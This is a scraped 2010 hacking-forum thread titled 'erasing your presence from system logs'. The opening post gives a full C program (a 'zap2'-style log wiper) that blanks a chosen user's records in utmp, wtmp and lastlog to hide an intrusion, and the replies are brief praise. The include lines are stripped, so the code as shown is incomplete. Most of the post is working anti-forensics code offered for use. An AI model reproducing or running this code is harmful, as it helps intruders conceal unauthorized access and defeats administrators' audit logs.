**REVENGER TEAM**
WELCOME TO THE REVENGER TEAM FORUM!! GET COOL MIG33 INFO AND OTHER SEVERAL THINGS! REGISTER TO ACCESS THE FULL FEATURE.

<font color="pink">Visit chatroom</font><font color="red">AMERICAN CHILD</font>

**REGARDS-<<REVENGER TEAM>>**
**REVENGER TEAM**
WELCOME TO THE REVENGER TEAM FORUM!! GET COOL MIG33 INFO AND OTHER SEVERAL THINGS! REGISTER TO ACCESS THE FULL FEATURE.

<font color="pink">Visit chatroom</font><font color="red">AMERICAN CHILD</font>

**REGARDS-<<REVENGER TEAM>>**
**REVENGER TEAM**
Would you like to react to this message? Create an account in a few clicks or log in to continue.

**REVENGER TEAM**

♥WELCOME♥ ♥TO♥ ♥REVENGER♥ ♥FAMILY♥
 
HomePortalGalleryLatest imagesSearchRegisterLog in
****REVENGER TEAM****
Latest topics
» quote 1
erasing your presence from system logs I_icon_minitimeThu Jul 07, 2011 9:34 pm by axif7

» quote 2
erasing your presence from system logs I_icon_minitimeThu Jul 07, 2011 9:33 pm by axif7

» MuAddicted
erasing your presence from system logs I_icon_minitimeWed May 25, 2011 11:21 pm by I-See-Sounds

» Kill The Leader v3 ***Free version***
erasing your presence from system logs I_icon_minitimeSun May 08, 2011 12:25 am by bemine_4ever

» special offers
erasing your presence from system logs I_icon_minitimeFri May 06, 2011 7:48 am by Admin

» how to reset ur avatar
erasing your presence from system logs I_icon_minitimeMon May 02, 2011 3:08 pm by bemine_4ever

» t3rmin4t0r has entereD
erasing your presence from system logs I_icon_minitimeMon May 02, 2011 3:07 pm by bemine_4ever

» Moderators required
erasing your presence from system logs I_icon_minitimeSun May 01, 2011 12:08 pm by bemine_4ever

» posting rules+ other infos
erasing your presence from system logs I_icon_minitimeSun May 01, 2011 12:01 pm by bemine_4ever

CHATBOX
©bishal.cbox.ws
Top posters
bemine_4ever (231)
erasing your presence from system logs I_vote_lcaperasing your presence from system logs I_voting_barerasing your presence from system logs I_vote_rcap 
axif7 (137)
erasing your presence from system logs I_vote_lcaperasing your presence from system logs I_voting_barerasing your presence from system logs I_vote_rcap 
Shaheen (118)
erasing your presence from system logs I_vote_lcaperasing your presence from system logs I_voting_barerasing your presence from system logs I_vote_rcap 
Admin (111)
erasing your presence from system logs I_vote_lcaperasing your presence from system logs I_voting_barerasing your presence from system logs I_vote_rcap 
Atom (59)
erasing your presence from system logs I_vote_lcaperasing your presence from system logs I_voting_barerasing your presence from system logs I_vote_rcap 
SyntaxError (52)
erasing your presence from system logs I_vote_lcaperasing your presence from system logs I_voting_barerasing your presence from system logs I_vote_rcap 
twink_shadow (50)
erasing your presence from system logs I_vote_lcaperasing your presence from system logs I_voting_barerasing your presence from system logs I_vote_rcap 
Nayanbanik (32)
erasing your presence from system logs I_vote_lcaperasing your presence from system logs I_voting_barerasing your presence from system logs I_vote_rcap 
laithrv (23)
erasing your presence from system logs I_vote_lcaperasing your presence from system logs I_voting_barerasing your presence from system logs I_vote_rcap 
forum (15)
erasing your presence from system logs I_vote_lcaperasing your presence from system logs I_voting_barerasing your presence from system logs I_vote_rcap 
FORUM STAFFS
ADMIN(admin)
Bemine_4ever(admin)
Admin_(admin)
axif7(supporter)
azhan(supporter)

 

 erasing your presence from system logs

Go down 
3 posters
AuthorMessage
icarus_13revenger
Level 2
Level 2



Posts : 4
Points : 4958006
Likes : 0
Join date : 2010-10-15

erasing your presence from system logs Empty
PostSubject: erasing your presence from system logs   erasing your presence from system logs I_icon_minitimeSun Oct 17, 2010 2:51 pm




¤¤ Erasing Your Presence From System Logs ¤¤



Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.



Example:



#include

#include

#include

#include

#include

#include

#include

#include

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"



int f;



void kill_utmp(who)

char *who;

{

struct utmp utmp_ent;



if ((f=open(UTMP_NAME,O_RDWR))>=0) {

while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof( utmp_ent ));

lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

write (f, &utmp_ent, sizeof (utmp_ent));

}

close(f);

}

}



void kill_wtmp(who)

char *who;

{

struct utmp utmp_ent;

long pos;



pos = 1L;

if ((f=open(WTMP_NAME,O_RDWR))>=0) {



while(pos != -1L) {

lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

pos = -1L;

} else {

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof(struct utmp ));

lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

write (f, &utmp_ent, sizeof (utmp_ent));

pos = -1L;

} else pos += 1L;

}

}

close(f);

}

}



void kill_lastlog(who)

char *who;

{

struct passwd *pwd;

struct lastlog newll;



if ((pwd=getpwnam(who))!=NULL) {



if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

bzero((char *)&newll,sizeof( newll ));

write(f, (char *)&newll, sizeof( newll ));

close(f);

}



} else printf("%s: ?\n",who);

}



main(argc,argv)

int argc;

char *argv[];

{

if (argc==2) {

kill_lastlog(argv[1]);

kill_wtmp(argv[1]);

kill_utmp(argv[1]);

printf("Zap2!\n");

} else

printf("Error.\n");

}







i have never used it personally friends

Back to top Go down
Shaheen
Level 13Level 13
Shaheen


Posts : 118
Points : 5010019
Likes : 1
Join date : 2010-12-17
Age : 31
Location : afghanistan

erasing your presence from system logs Empty
PostSubject: Re: erasing your presence from system logs   erasing your presence from system logs I_icon_minitimeTue Dec 21, 2010 7:29 pm

hmmmm
Back to top Go down
http://www.americanchild.wapsite.me
twink_shadow
Level 10
Level 10



Posts : 50
Points : 4956016
Likes : 1
Join date : 2010-12-14

erasing your presence from system logs Empty
PostSubject: Re: erasing your presence from system logs   erasing your presence from system logs I_icon_minitimeTue Dec 21, 2010 11:59 pm

nice ....
Back to top Go down
Shaheen
Level 13Level 13
Shaheen


Posts : 118
Points : 5010019
Likes : 1
Join date : 2010-12-17
Age : 31
Location : afghanistan

erasing your presence from system logs Empty
PostSubject: Re: erasing your presence from system logs   erasing your presence from system logs I_icon_minitimeWed Dec 22, 2010 11:55 am

keep it up
Back to top Go down
http://www.americanchild.wapsite.me
Sponsored content





erasing your presence from system logs Empty
PostSubject: Re: erasing your presence from system logs   erasing your presence from system logs I_icon_minitime

Back to top Go down
 
erasing your presence from system logs
Back to top 
Page 1 of 1
 Similar topics
-
» UPDATE: System issues resolved.

Permissions in this forum:You cannot reply to topics in this forum
**REVENGER TEAM** :: ♥♥♥Pc-ZonE♥♥♥ :: Analytical Engine-
Jump to: